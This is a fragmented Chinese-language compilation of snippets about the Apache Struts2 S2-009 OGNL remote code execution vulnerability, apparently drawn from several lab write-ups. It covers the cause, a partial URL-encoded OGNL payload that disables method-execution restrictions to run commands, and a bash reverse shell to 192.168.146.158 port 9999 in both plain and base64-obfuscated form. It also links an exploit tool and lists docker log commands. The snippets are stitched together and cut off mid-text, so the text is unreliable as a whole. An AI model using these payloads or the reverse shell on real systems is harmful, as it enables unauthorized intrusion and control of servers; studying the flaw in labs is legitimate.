将denyMethodExecution设置为false,允许执行某些方法 将allowStaticMethodAccess设置为true,允许静态方法的访问,进一步放宽了安全限制 命令执行touch /tmp/ailx10会在/tmp目录下创建一个名为ailx10的空文件 经过URL编码,部分空格转+号处理,执行的命令里面的空格不需要转+号 age=12313&name=%28%23context[%22xwork.Met...
Struts2远程命令执行漏洞(S2-009)是Apache Struts2框架中存在的一个安全漏洞,允许攻击者通过精心构造的OGNL(Object-Graph Navigation Language)表达式注入恶意代码,从而在受影响的Web应用程序上执行任意命令。这种漏洞对使用Apache Struts2框架的Web应用程序构成了严重的安全风险。 2. s2-009漏洞的产生原因 Struts2 S2-0...
先对S2-009.war进行解压(我用binwalk,其实直接zip就可以),可见源码都在WEB-INF/src目录中,我一般找ajax相关的代码,这些代码一般逻辑比较简单。 找到一个WEB-INF/src/java/org/apache/struts2/showcase/ajax/Example5Action.java: publicclassExample5ActionextendsActionSupport{privatestaticfinal long serialVersionUID...
发现dns有记录,说明存在该漏洞。 既然发现漏洞了,那我们可以开始反弹shell 代码语言:javascript 复制 bash-i>&/dev/tcp/192.168.146.158/99990>&1base加密 bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i} 访问漏洞url并且添加恶意payload进行抓包。 代...
工具地址:https://github.com/Liqunkit/LiqunKit_ 0X05-查看日志# docker ps#查看容器IDdockerexec-it ID /bin/bash#进入cdlogs#进入日志目录catlocalhost_access_log.2021-12-02.txt#查看日志exit#退出容器 0X06-参考# S2-009 远程代码执行漏洞